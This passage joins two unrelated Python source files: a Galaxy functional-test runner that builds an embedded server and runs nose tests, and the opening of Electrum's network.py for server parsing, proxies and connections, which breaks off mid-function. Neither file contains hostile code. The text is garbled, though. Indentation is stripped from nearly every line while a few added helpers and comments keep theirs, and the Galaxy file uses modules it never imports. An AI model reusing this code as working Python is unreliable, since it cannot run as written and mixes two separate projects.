cwd = os.getcwd()
new_path = [ os.path.join( cwd, "lib" ), os.path.join( cwd, "test" ) ]
new_path.extend( sys.path[1:] )
sys.path = new_path
from base.tool_shed_util import parse_tool_panel_config
from galaxy import eggs
from galaxy.util.properties import load_app_properties
eggs.require( "nose" )
eggs.require( "NoseHTML" )
eggs.require( "NoseTestDiff" )
eggs.require( "twill==0.9" )
eggs.require( "Paste" )
eggs.require( "PasteDeploy" )
eggs.require( "Cheetah" )
# this should not be required, but it is under certain conditions, thanks to this bug:
# http://code.google.com/p/python-nose/issues/detail?id=284
eggs.require( "pysqlite" )
import atexit
import logging
import os.path
import twill
import unittest
import time
import subprocess
import threading
import random
import httplib
import socket
import urllib
from paste import httpserver
import galaxy.app
from galaxy.app import UniverseApplication
from galaxy.web import buildapp
from galaxy import tools
from galaxy.util import bunch
from galaxy import util
from galaxy.util.json import dumps
from functional import database_contexts
from base.api_util import get_master_api_key
from base.api_util import get_user_api_key
from base.nose_util import run
from base.instrument import StructuredTestDataPlugin
import nose.core
import nose.config
import nose.loader
import nose.plugins.manager
log = logging.getLogger( "functional_tests.py" )
default_galaxy_test_host = "localhost"
default_galaxy_test_port_min = 8000
default_galaxy_test_port_max = 9999
default_galaxy_locales = 'en'
default_galaxy_test_file_dir = "test-data"
migrated_tool_panel_config = 'config/migrated_tools_conf.xml'
installed_tool_panel_configs = [ 'config/shed_tool_conf.xml' ]
# should this serve static resources (scripts, images, styles, etc.)
STATIC_ENABLED = True
# Set up a job_conf.xml that explicitly limits jobs to 10 minutes.
job_conf_xml = '''<?xml version="1.0"?>
<!-- A test job config that explicitly configures job running the way it is configured by default (if there is no explicit config). -->
<job_conf>
<plugins>
<plugin id="local" type="runner" load="galaxy.jobs.runners.local:LocalJobRunner" workers="4"/>
</plugins>
<handlers>
<handler id="main"/>
</handlers>
<destinations>
<destination id="local" runner="local"/>
</destinations>
<limits>
<limit type="walltime">00:10:00</limit>
</limits>
</job_conf>
'''
def get_static_settings():
"""Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
cwd = os.getcwd()
static_dir = os.path.join( cwd, 'static' )
#TODO: these should be copied from config/galaxy.ini
return dict(
#TODO: static_enabled needed here?
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join( static_dir, 'images', '' ),
static_favicon_dir=os.path.join( static_dir, 'favicon.ico' ),
static_scripts_dir=os.path.join( static_dir, 'scripts', '' ),
static_style_dir=os.path.join( static_dir, 'june_2007_style', 'blue' ),
static_robots_txt=os.path.join( static_dir, 'robots.txt' ),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent as the first argument to app_factory.
"""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
if STATIC_ENABLED:
global_conf.update( get_static_settings() )
return global_conf
def generate_config_file( input_filename, output_filename, config_items ):
'''
Generate a config file with the configuration that has been defined for the embedded web application.
This is mostly relevant when setting metadata externally, since the script for doing that does not
have access to app.config.
'''
cp = SafeConfigParser()
cp.read( input_filename )
config_items_by_section = []
for label, value in config_items:
found = False
# Attempt to determine the correct section for this configuration option.
for section in cp.sections():
if cp.has_option( section, label ):
config_tuple = section, label, value
config_items_by_section.append( config_tuple )
found = True
continue
# Default to app:main if no section was found.
if not found:
config_tuple = 'app:main', label, value
config_items_by_section.append( config_tuple )
print( config_items_by_section )
# Replace the default values with the provided configuration.
for section, label, value in config_items_by_section:
if cp.has_option( section, label ):
cp.remove_option( section, label )
cp.set( section, label, str( value ) )
fh = open( output_filename, 'w' )
cp.write( fh )
fh.close()
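def _example_generate_config():
    # Hedged usage sketch: rewrite a single option; both paths and the
    # connection string are placeholders.
    generate_config_file( 'config/galaxy.ini.sample', '/tmp/test_galaxy.ini',
                          [ ( 'database_connection', 'sqlite:////tmp/test.sqlite' ) ] )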
def run_tests( test_config ):
return run( test_config )
def __copy_database_template( source, db_path ):
"""
Copy a 'clean' sqlite template database (from file or URL) to specified
database path.
"""
os.makedirs( os.path.dirname( db_path ) )
if os.path.exists( source ):
shutil.copy( source, db_path )
assert os.path.exists( db_path )
elif source.lower().startswith( ( "http://", "https://", "ftp://" ) ):
urllib.urlretrieve( source, db_path )
else:
raise Exception( "Failed to copy database template from source %s" % source )
def main():
# ---- Configuration ------------------------------------------------------
galaxy_test_host = os.environ.get( 'GALAXY_TEST_HOST', default_galaxy_test_host )
galaxy_test_port = os.environ.get( 'GALAXY_TEST_PORT', None )
galaxy_test_save = os.environ.get( 'GALAXY_TEST_SAVE', None)
tool_path = os.environ.get( 'GALAXY_TEST_TOOL_PATH', 'tools' )
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = default_galaxy_locales
testing_migrated_tools = __check_arg( '-migrated' )
testing_installed_tools = __check_arg( '-installed' )
datatypes_conf_override = None
if testing_migrated_tools or testing_installed_tools:
# Store a jsonified dictionary of tool_id : GALAXY_TEST_FILE_DIR pairs.
galaxy_tool_shed_test_file = 'shed_tools_dict'
# We need the upload tool for functional tests, so we'll create a temporary tool panel config that defines it.
fd, tmp_tool_panel_conf = tempfile.mkstemp()
os.write( fd, '<?xml version="1.0"?>\n' )
os.write( fd, '<toolbox>\n' )
os.write( fd, '<tool file="data_source/upload.xml"/>\n' )
os.write( fd, '</toolbox>\n' )
os.close( fd )
tool_config_file = tmp_tool_panel_conf
galaxy_test_file_dir = None
library_import_dir = None
user_library_import_dir = None
# Exclude all files except test_toolbox.py.
ignore_files = ( re.compile( r'^test_[adghlmsu]*' ), re.compile( r'^test_ta*' ) )
else:
framework_tool_dir = os.path.join('test', 'functional', 'tools')
framework_test = __check_arg( '-framework' ) # Run through suite of tests testing framework.
if framework_test:
tool_conf = os.path.join( framework_tool_dir, 'samples_tool_conf.xml' )
datatypes_conf_override = os.path.join( framework_tool_dir, 'sample_datatypes_conf.xml' )
else:
# Use tool_conf.xml toolbox.
tool_conf = None
if __check_arg( '-with_framework_test_tools' ):
tool_conf = "%s,%s" % ( 'config/tool_conf.xml.sample', os.path.join( framework_tool_dir, 'samples_tool_conf.xml' ) )
test_dir = default_galaxy_test_file_dir
tool_config_file = os.environ.get( 'GALAXY_TEST_TOOL_CONF', tool_conf )
galaxy_test_file_dir = os.environ.get( 'GALAXY_TEST_FILE_DIR', test_dir )
if not os.path.isabs( galaxy_test_file_dir ):
galaxy_test_file_dir = os.path.join( os.getcwd(), galaxy_test_file_dir )
library_import_dir = galaxy_test_file_dir
import_dir = os.path.join( galaxy_test_file_dir, 'users' )
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
ignore_files = ()
start_server = 'GALAXY_TEST_EXTERNAL' not in os.environ
tool_data_table_config_path = None
if os.path.exists( 'tool_data_table_conf.test.xml' ):
# If explicitly defined tables for test, use those.
tool_data_table_config_path = 'tool_data_table_conf.test.xml'
else:
        # ... otherwise find whatever Galaxy would use as the default and
        # add the sample data for functional tests to that.
default_tool_data_config = 'config/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml' ]:
if os.path.exists( tool_data_config ):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
default_data_manager_config = 'config/data_manager_conf.xml.sample'
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml' ]:
if os.path.exists( data_manager_config ):
default_data_manager_config = data_manager_config
data_manager_config_file = "%s,test/functional/tools/sample_data_manager_conf.xml" % default_data_manager_config
shed_tool_data_table_config = 'config/shed_tool_data_table_conf.xml'
tool_dependency_dir = os.environ.get( 'GALAXY_TOOL_DEPENDENCY_DIR', None )
use_distributed_object_store = os.environ.get( 'GALAXY_USE_DISTRIBUTED_OBJECT_STORE', False )
galaxy_test_tmp_dir = os.environ.get( 'GALAXY_TEST_TMP_DIR', None )
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
galaxy_job_conf_file = os.environ.get( 'GALAXY_TEST_JOB_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_job_conf.xml' ) )
# Generate the job_conf.xml file.
file( galaxy_job_conf_file, 'w' ).write( job_conf_xml )
database_auto_migrate = False
galaxy_test_proxy_port = None
if start_server:
tempdir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
# Configure the database path.
if 'GALAXY_TEST_DBPATH' in os.environ:
galaxy_db_path = os.environ[ 'GALAXY_TEST_DBPATH' ]
else:
galaxy_db_path = os.path.join( tempdir, 'database' )
# Configure the paths Galaxy needs to test tools.
file_path = os.path.join( galaxy_db_path, 'files' )
new_file_path = tempfile.mkdtemp( prefix='new_files_path_', dir=tempdir )
job_working_directory = tempfile.mkdtemp( prefix='job_working_directory_', dir=tempdir )
install_database_connection = os.environ.get( 'GALAXY_TEST_INSTALL_DBURI', None )
if 'GALAXY_TEST_DBURI' in os.environ:
database_connection = os.environ['GALAXY_TEST_DBURI']
else:
db_path = os.path.join( galaxy_db_path, 'universe.sqlite' )
if 'GALAXY_TEST_DB_TEMPLATE' in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
log.debug( "Copying database template from %s.", os.environ['GALAXY_TEST_DB_TEMPLATE'] )
__copy_database_template(os.environ['GALAXY_TEST_DB_TEMPLATE'], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
kwargs = {}
for dir in file_path, new_file_path:
try:
if not os.path.exists( dir ):
os.makedirs( dir )
except OSError:
pass
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
data_manager_test_tmp_path = tempfile.mkdtemp( prefix='data_manager_test_tmp', dir=galaxy_test_tmp_dir )
galaxy_data_manager_data_path = tempfile.mkdtemp( prefix='data_manager_tool-data', dir=data_manager_test_tmp_path )
# ---- Build Application --------------------------------------------------
master_api_key = get_master_api_key()
app = None
if start_server:
kwargs = dict( admin_users='test@bx.psu.edu',
api_allow_run_as='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
database_connection=database_connection,
database_auto_migrate=database_auto_migrate,
datatype_converters_config_file="datatype_converters_conf.xml.sample",
file_path=file_path,
id_secret='changethisinproductiontoo',
job_queue_workers=5,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
running_functional_tests=True,
shed_tool_data_table_config=shed_tool_data_table_config,
template_path="templates",
test_conf="test.conf",
tool_config_file=tool_config_file,
tool_data_table_config_path=tool_data_table_config_path,
tool_path=tool_path,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
tool_parse_help=False,
update_integrated_tool_panel=False,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
master_api_key=master_api_key,
use_tasked_jobs=True,
enable_beta_tool_formats=True,
data_manager_config_file=data_manager_config_file,
)
if install_database_connection is not None:
kwargs[ 'install_database_connection' ] = install_database_connection
if not database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_max_overflow' ] = '20'
kwargs[ 'database_engine_option_pool_size' ] = '10'
if tool_dependency_dir is not None:
kwargs[ 'tool_dependency_dir' ] = tool_dependency_dir
if use_distributed_object_store:
kwargs[ 'object_store' ] = 'distributed'
kwargs[ 'distributed_object_store_config_file' ] = 'distributed_object_store_conf.xml.sample'
if datatypes_conf_override:
kwargs[ 'datatypes_config_file' ] = datatypes_conf_override
# If the user has passed in a path for the .ini file, do not overwrite it.
galaxy_config_file = os.environ.get( 'GALAXY_TEST_INI_FILE', None )
if not galaxy_config_file:
galaxy_config_file = os.path.join( galaxy_test_tmp_dir, 'functional_tests_wsgi.ini' )
config_items = []
for label in kwargs:
config_tuple = label, kwargs[ label ]
config_items.append( config_tuple )
# Write a temporary file, based on config/galaxy.ini.sample, using the configuration options defined above.
generate_config_file( 'config/galaxy.ini.sample', galaxy_config_file, config_items )
# Set the global_conf[ '__file__' ] option to the location of the temporary .ini file, which gets passed to set_metadata.sh.
kwargs[ 'global_conf' ] = get_webapp_global_conf()
kwargs[ 'global_conf' ][ '__file__' ] = galaxy_config_file
kwargs[ 'config_file' ] = galaxy_config_file
kwargs = load_app_properties(
kwds=kwargs
)
# Build the Universe Application
app = UniverseApplication( **kwargs )
database_contexts.galaxy_context = app.model.context
log.info( "Embedded Universe application started" )
# ---- Run webserver ------------------------------------------------------
server = None
if start_server:
webapp = buildapp.app_factory( kwargs[ 'global_conf' ], app=app,
use_translogger=False, static_enabled=STATIC_ENABLED )
if galaxy_test_port is not None:
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
galaxy_test_port = str( random.randint( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s" % galaxy_test_port )
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
break
except socket.error, e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % ( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
if galaxy_test_proxy_port:
os.environ['GALAXY_TEST_PORT'] = galaxy_test_proxy_port
else:
os.environ['GALAXY_TEST_PORT'] = galaxy_test_port
t = threading.Thread( target=server.serve_forever )
t.start()
# Test if the server is up
for i in range( 10 ):
conn = httplib.HTTPConnection( galaxy_test_host, galaxy_test_port ) # directly test the app, not the proxy
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
log.info( "Embedded web server started" )
# ---- Find tests ---------------------------------------------------------
if galaxy_test_proxy_port:
log.info( "Functional tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_proxy_port ) )
else:
log.info( "Functional tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_port ) )
success = False
try:
tool_configs = app.config.tool_configs
# What requires these? Handy for (eg) functional tests to save outputs?
if galaxy_test_save:
os.environ[ 'GALAXY_TEST_SAVE' ] = galaxy_test_save
# Passed in through the script's environment; leaves a copy of ALL test validation files
os.environ[ 'GALAXY_TEST_HOST' ] = galaxy_test_host
def _run_functional_test( testing_shed_tools=None ):
workflow_test = __check_arg( '-workflow', param=True )
if workflow_test:
import functional.workflow
functional.workflow.WorkflowTestCase.workflow_test_file = workflow_test
functional.workflow.WorkflowTestCase.master_api_key = master_api_key
functional.workflow.WorkflowTestCase.user_api_key = get_user_api_key()
data_manager_test = __check_arg( '-data_managers', param=False )
if data_manager_test:
import functional.test_data_managers
functional.test_data_managers.data_managers = app.data_managers #seems like a hack...
functional.test_data_managers.build_tests(
tmp_dir=data_manager_test_tmp_path,
testing_shed_tools=testing_shed_tools,
master_api_key=master_api_key,
user_api_key=get_user_api_key(),
)
else:
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_context is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_context
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = app.toolbox
# When testing data managers, do not test toolbox.
functional.test_toolbox.build_tests(
app=app,
testing_shed_tools=testing_shed_tools,
master_api_key=master_api_key,
user_api_key=get_user_api_key(),
)
test_config = nose.config.Config( env=os.environ, ignoreFiles=ignore_files, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.plugins.addPlugin( StructuredTestDataPlugin() )
test_config.configure( sys.argv )
result = run_tests( test_config )
success = result.wasSuccessful()
return success
if testing_migrated_tools or testing_installed_tools:
shed_tools_dict = {}
if testing_migrated_tools:
has_test_data, shed_tools_dict = parse_tool_panel_config( migrated_tool_panel_config, shed_tools_dict )
elif testing_installed_tools:
for shed_tool_config in installed_tool_panel_configs:
has_test_data, shed_tools_dict = parse_tool_panel_config( shed_tool_config, shed_tools_dict )
# Persist the shed_tools_dict to the galaxy_tool_shed_test_file.
shed_tools_file = open( galaxy_tool_shed_test_file, 'w' )
shed_tools_file.write( dumps( shed_tools_dict ) )
shed_tools_file.close()
if not os.path.isabs( galaxy_tool_shed_test_file ):
galaxy_tool_shed_test_file = os.path.join( os.getcwd(), galaxy_tool_shed_test_file )
os.environ[ 'GALAXY_TOOL_SHED_TEST_FILE' ] = galaxy_tool_shed_test_file
if testing_installed_tools:
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
# and reload the app's toolbox.
relative_migrated_tool_panel_config = os.path.join( app.config.root, migrated_tool_panel_config )
if relative_migrated_tool_panel_config in tool_configs:
tool_configs.remove( relative_migrated_tool_panel_config )
for installed_tool_panel_config in installed_tool_panel_configs:
tool_configs.append( installed_tool_panel_config )
app.toolbox = tools.ToolBox( tool_configs, app.config.tool_path, app )
success = _run_functional_test( testing_shed_tools=True )
try:
os.unlink( tmp_tool_panel_conf )
except:
log.info( "Unable to remove temporary file: %s" % tmp_tool_panel_conf )
try:
os.unlink( galaxy_tool_shed_test_file )
except:
log.info( "Unable to remove file: %s" % galaxy_tool_shed_test_file )
else:
if galaxy_test_file_dir:
os.environ[ 'GALAXY_TEST_FILE_DIR' ] = galaxy_test_file_dir
success = _run_functional_test( )
except:
log.exception( "Failure running tests" )
log.info( "Shutting down" )
# ---- Tear down -----------------------------------------------------------
if server:
log.info( "Shutting down embedded web server" )
server.server_close()
server = None
log.info( "Embedded web server stopped" )
if app:
log.info( "Shutting down app" )
app.shutdown()
app = None
log.info( "Embedded Universe application stopped" )
try:
if os.path.exists( tempdir ) and 'GALAXY_TEST_NO_CLEANUP' not in os.environ:
log.info( "Cleaning up temporary files in %s" % tempdir )
shutil.rmtree( tempdir )
else:
log.info( "GALAXY_TEST_NO_CLEANUP is on. Temporary files in %s" % tempdir )
except:
pass
if success:
return 0
else:
return 1
def __check_arg( name, param=False ):
try:
index = sys.argv.index( name )
del sys.argv[ index ]
if param:
ret_val = sys.argv[ index ]
del sys.argv[ index ]
else:
ret_val = True
except ValueError:
ret_val = False
return ret_val
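# A small illustration of __check_arg (hypothetical argv values, not from the source):
#   sys.argv == ['functional_tests.py', '-framework']
#     __check_arg('-framework')            -> True, and the flag is removed from sys.argv
#   sys.argv == ['functional_tests.py', '-workflow', 'wf_tests.yml']
#     __check_arg('-workflow', param=True) -> 'wf_tests.yml', and both tokens are removed
# A flag that is absent simply returns False and leaves sys.argv untouched.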
if __name__ == "__main__":
sys.exit( main() )
|
network.py |
# Electrum - Lightweight Bitcoin Client
# Copyright (c) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import time
import queue
import os
import stat
import errno
import sys
import random
import select
import traceback
import re
from collections import defaultdict, deque
import threading
import socket
import json
import socks
from . import util
from . import bitcoin
from .bitcoin import *
from .interface import Connection, Interface
from . import blockchain
from .version import ELECTRUM_VERSION, PROTOCOL_VERSION
NODES_RETRY_INTERVAL = 60
SERVER_RETRY_INTERVAL = 10
def parse_servers(result):
""" parse servers list into dict format"""
from .version import PROTOCOL_VERSION
servers = {}
for item in result:
host = item[1]
out = {}
version = None
pruning_level = '-'
if len(item) > 2:
for v in item[2]:
if re.match("[st]\d*", v):
protocol, port = v[0], v[1:]
if port == '': port = bitcoin.DEFAULT_PORTS[protocol]
out[protocol] = port
elif re.match("v(.?)+", v):
version = v[1:]
elif re.match("p\d*", v):
pruning_level = v[1:]
if pruning_level == '': pruning_level = '0'
if out:
out['pruning'] = pruning_level
out['version'] = version
servers[host] = out
return servers
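# Worked example (assumed input shape for one 'server.peers.subscribe' entry;
# the host name is made up): an item like
#   ['192.0.2.10', 'electrum.example.org', ['v1.2', 's50002', 't50001', 'p10000']]
# is parsed into
#   {'electrum.example.org': {'s': '50002', 't': '50001',
#                             'pruning': '10000', 'version': '1.2'}}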
def filter_version(servers):
def is_recent(version):
try:
return util.normalize_version(version) >= util.normalize_version(PROTOCOL_VERSION)
except Exception as e:
return False
return {k: v for k, v in servers.items() if is_recent(v.get('version'))}
def filter_protocol(hostmap, protocol = 's'):
'''Filters the hostmap for those implementing protocol.
The result is a list in serialized form.'''
eligible = []
for host, portmap in hostmap.items():
port = portmap.get(protocol)
if port:
eligible.append(serialize_server(host, port, protocol))
return eligible
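# e.g. (illustration): filter_protocol({'electrum.example.org': {'s': '50002'}})
# returns ['electrum.example.org:50002:s'], i.e. the serialized "host:port:protocol" form.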
def pick_random_server(hostmap = None, protocol = 's', exclude_set = set()):
if hostmap is None:
hostmap = bitcoin.DEFAULT_SERVERS
eligible = list(set(filter_protocol(hostmap, protocol)) - exclude_set)
return random.choice(eligible) if eligible else None
from .simple_config import SimpleConfig
proxy_modes = ['socks4', 'socks5', 'http']
def serialize_proxy(p):
if not isinstance(p, dict):
return None
return ':'.join([p.get('mode'),p.get('host'), p.get('port'), p.get('user'), p.get('password')])
def deserialize_proxy(s):
if not isinstance(s, str):
return None
if s.lower() == 'none':
return None
proxy = { "mode":"socks5", "host":"localhost" }
args = s.split(':')
n = 0
if proxy_modes.count(args[n]) == 1:
proxy["mode"] = args[n]
n += 1
if len(args) > n:
proxy["host"] = args[n]
n += 1
if len(args) > n:
proxy["port"] = args[n]
n += 1
else:
proxy["port"] = "8080" if proxy["mode"] == "http" else "1080"
if len(args) > n:
proxy["user"] = args[n]
n += 1
if len(args) > n:
proxy["password"] = args[n]
return proxy
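# Worked example of the "mode:host:port:user:password" string handled above
# (values are made up): deserialize_proxy('socks5:127.0.0.1:9050') returns
#   {'mode': 'socks5', 'host': '127.0.0.1', 'port': '9050'}
# while a bare 'localhost' keeps the default mode and, because no port was
# given, falls back to '1080' ('8080' for an http proxy).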
def deserialize_server(server_str):
host, port, protocol = str(server_str).split(':')
assert protocol in 'st'
int(port) # Throw if cannot be converted to int
return host, port, protocol
def serialize_server(host, port, protocol):
return str(':'.join([host, port, protocol]))
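# e.g. (illustration): deserialize_server('electrum.example.org:50002:s')
# -> ('electrum.example.org', '50002', 's'); a non-numeric port or a protocol
# other than 's'/'t' raises, which callers rely on to sanitize config values.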
class Network(util.DaemonThread):
"""The Network class manages a set of connections to remote electrum
servers, each connected socket is handled by an Interface() object.
Connections are initiated by a Connection() thread which stops once
the connection succeeds or fails.
Our external API:
- Member functions get_header(), get_interfaces(), get_local_height(),
get_parameters(), get_server_height(), get_status_value(),
is_connected(), set_parameters(), stop()
"""
def __init__(self, config=None):
if config is None:
config = {} # Do not use mutables as default values!
util.DaemonThread.__init__(self)
self.config = SimpleConfig(config) if isinstance(config, dict) else config
self.num_server = 10 if not self.config.get('oneserver') else 0
self.blockchains = blockchain.read_blockchains(self.config)
self.print_error("blockchains", self.blockchains.keys())
self.blockchain_index = config.get('blockchain_index', 0)
if self.blockchain_index not in self.blockchains.keys():
self.blockchain_index = 0
# Server for addresses and transactions
self.default_server = self.config.get('server')
# Sanitize default server
try:
deserialize_server(self.default_server)
except:
self.default_server = None
if not self.default_server:
self.default_server = pick_random_server()
self.lock = threading.Lock()
self.pending_sends = []
self.message_id = 0
self.debug = False
self.irc_servers = {} # returned by interface (list from irc)
self.recent_servers = self.read_recent_servers()
self.banner = ''
self.donation_address = ''
self.relay_fee = None
# callbacks passed with subscriptions
self.subscriptions = defaultdict(list)
self.sub_cache = {}
# callbacks set by the GUI
self.callbacks = defaultdict(list)
dir_path = os.path.join( self.config.path, 'certs')
if not os.path.exists(dir_path):
os.mkdir(dir_path)
os.chmod(dir_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
# subscriptions and requests
self.subscribed_addresses = set()
self.h2addr = {}
# Requests from client we've not seen a response to
self.unanswered_requests = {}
# retry times
self.server_retry_time = time.time()
self.nodes_retry_time = time.time()
# kick off the network. interface is the main server we are currently
# communicating with. interfaces is the set of servers we are connecting
# to or have an ongoing connection with
self.interface = None
self.interfaces = {}
self.auto_connect = self.config.get('auto_connect', True)
self.connecting = set()
self.socket_queue = queue.Queue()
self.start_network(deserialize_server(self.default_server)[2],
deserialize_proxy(self.config.get('proxy')))
def register_callback(self, callback, events):
with self.lock:
for event in events:
self.callbacks[event].append(callback)
def unregister_callback(self, callback):
with self.lock:
for callbacks in self.callbacks.values():
if callback in callbacks:
callbacks.remove(callback)
def trigger_callback(self, event, *args):
with self.lock:
callbacks = self.callbacks[event][:]
[callback(event, *args) for callback in callbacks]
def read_recent_servers(self):
if not self.config.path:
return []
path = os.path.join(self.config.path, "recent_servers")
try:
with open(path, "r") as f:
data = f.read()
return json.loads(data)
except:
return []
def save_recent_servers(self):
if not self.config.path:
return
path = os.path.join(self.config.path, "recent_servers")
s = json.dumps(self.recent_servers, indent=4, sort_keys=True)
try:
with open(path, "w") as f:
f.write(s)
except:
pass
def get_server_height(self):
return self.interface.tip if self.interface else 0
def server_is_lagging(self):
sh = self.get_server_height()
if not sh:
self.print_error('no height for main interface')
return True
lh = self.get_local_height()
result = (lh - sh) > 1
if result:
self.print_error('%s is lagging (%d vs %d)' % (self.default_server, sh, lh))
return result
def set_status(self, status):
self.connection_status = status
self.notify('status')
def is_connected(self):
return self.interface is not None
def is_connecting(self):
return self.connection_status == 'connecting'
def is_up_to_date(self):
return self.unanswered_requests == {}
def queue_request(self, method, params, interface=None):
# If you want to queue a request on any interface it must go
# through this function so message ids are properly tracked
if interface is None:
interface = self.interface
message_id = self.message_id
self.message_id += 1
if self.debug:
self.print_error(interface.host, "-->", method, params, message_id)
interface.queue_request(method, params, message_id)
return message_id
def send_subscriptions(self):
self.print_error('sending subscriptions to', self.interface.server, len(self.unanswered_requests), len(self.subscribed_addresses))
self.sub_cache.clear()
# Resend unanswered requests
requests = self.unanswered_requests.values()
self.unanswered_requests = {}
for request in requests:
message_id = self.queue_request(request[0], request[1])
self.unanswered_requests[message_id] = request
self.queue_request('server.banner', [])
self.queue_request('server.donation_address', [])
self.queue_request('server.peers.subscribe', [])
self.request_fee_estimates()
self.queue_request('blockchain.relayfee', [])
if self.interface.ping_required():
params = [ELECTRUM_VERSION, PROTOCOL_VERSION]
self.queue_request('server.version', params, self.interface)
for h in self.subscribed_addresses:
self.queue_request('blockchain.scripthash.subscribe', [h])
def request_fee_estimates(self):
self.config.requested_fee_estimates()
for i in bitcoin.FEE_TARGETS:
self.queue_request('blockchain.estimatefee', [i])
def get_status_value(self, key):
if key == 'status':
value = self.connection_status
elif key == 'banner':
value = self.banner
elif key == 'fee':
value = self.config.fee_estimates
elif key == 'updated':
value = (self.get_local_height(), self.get_server_height())
elif key == 'servers':
value = self.get_servers()
elif key == 'interfaces':
value = self.get_interfaces()
return value
def notify(self, key):
if key in ['status', 'updated']:
self.trigger_callback(key)
else:
self.trigger_callback(key, self.get_status_value(key))
def get_parameters(self):
host, port, protocol = deserialize_server(self.default_server)
return host, port, protocol, self.proxy, self.auto_connect
def get_donation_address(self):
if self.is_connected():
return self.donation_address
def get_interfaces(self):
'''The interfaces that are in connected state'''
return list(self.interfaces.keys())
def get_servers(self):
out = bitcoin.DEFAULT_SERVERS
if self.irc_servers:
out.update(filter_version(self.irc_servers.copy()))
else:
for s in self.recent_servers:
try:
host, port, protocol = deserialize_server(s)
except:
continue
if host not in out:
out[host] = { protocol:port }
return out
def start_interface(self, server):
if server not in self.interfaces and server not in self.connecting:
if server == self.default_server:
self.print_error("connecting to %s as new interface" % server)
self.set_status('connecting')
self.connecting.add(server)
c = Connection(server, self.socket_queue, self.config.path)
def start_random_interface(self):
exclude_set = self.disconnected_servers.union(set(self.interfaces))
server = pick_random_server(self.get_servers(), self.protocol, exclude_set)
if server:
self.start_interface(server)
def start_interfaces(self):
self.start_interface(self.default_server)
for i in range(self.num_server - 1):
self.start_random_interface()
def set_proxy(self, proxy):
self.proxy = proxy
# Store these somewhere so we can un-monkey-patch
if not hasattr(socket, "_socketobject"):
socket._socketobject = socket.socket
socket._getaddrinfo = socket.getaddrinfo
if proxy:
self.print_error('setting proxy', proxy)
proxy_mode = proxy_modes.index(proxy["mode"]) + 1
socks.setdefaultproxy(proxy_mode,
proxy["host"],
int(proxy["port"]),
# socks.py seems to want either None or a non-empty string
username=(proxy.get("user", "") or None),
password=(proxy.get("password", "") or None))
socket.socket = socks.socksocket
# prevent dns leaks, see http://stackoverflow.com/questions/13184205/dns-over-proxy
socket.getaddrinfo = lambda *args: [(socket.AF_INET, socket.SOCK_STREAM, 6, '', (args[0], args[1]))]
else:
socket.socket = socket._socketobject
socket.getaddrinfo = socket._getaddrinfo
def start_network(self, protocol, proxy):
assert not self.interface and not self.interfaces
assert not self.connecting and self.socket_queue.empty()
self.print_error('starting network')
